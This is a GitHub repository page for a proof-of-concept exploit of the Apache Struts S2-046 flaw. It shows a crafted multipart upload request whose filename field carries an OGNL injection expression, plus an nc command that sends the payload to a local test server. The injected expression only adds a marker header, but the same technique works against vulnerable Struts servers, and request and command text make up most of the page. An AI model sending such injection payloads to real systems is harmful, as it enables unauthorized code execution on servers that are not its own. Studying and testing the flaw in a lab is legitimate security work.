Skip to content

su3158/S2-046-PoC

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 

Repository files navigation

S2-046-PoC

References:

Proof of concept:

Start vulnerable application with:

mvn jetty:run

Sample request:

POST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 1000000000
Cache-Control: max-age=0
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://localhost:8080/doUpload
Accept-Language: en-US,en;q=0.8,es;q=0.6
Connection: close

------WebKitFormBoundaryXd004BVJN9pBYBL2
Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"
Content-Type: text/plain


foo
------WebKitFormBoundaryXd004BVJN9pBYBL2--

Send request:

export payload="POST /doUpload.action HTTP/1.1\r\nHost: localhost:8080\r\nContent-Length: 279000000\r\nCache-Control: max-age=0\r\nOrigin: http://localhost:8080\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nReferer: http://localhost:8080/doUpload\r\nAccept-Language: en-US,en;q=0.8,es;q=0.6\r\nConnection: close\r\n\r\n------WebKitFormBoundaryXd004BVJN9pBYBL2\r\nContent-Disposition: form-data; name=\"upload\"; filename=\"%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}\"\r\nContent-Type: text/plain\r\n\r\nfoo\r\n------WebKitFormBoundaryXd004BVJN9pBYBL2--\r\n"
echo -e "$payload" | nc localhost 8080

Releases

No releases published

Packages

No packages published

Languages

  • Java 100.0%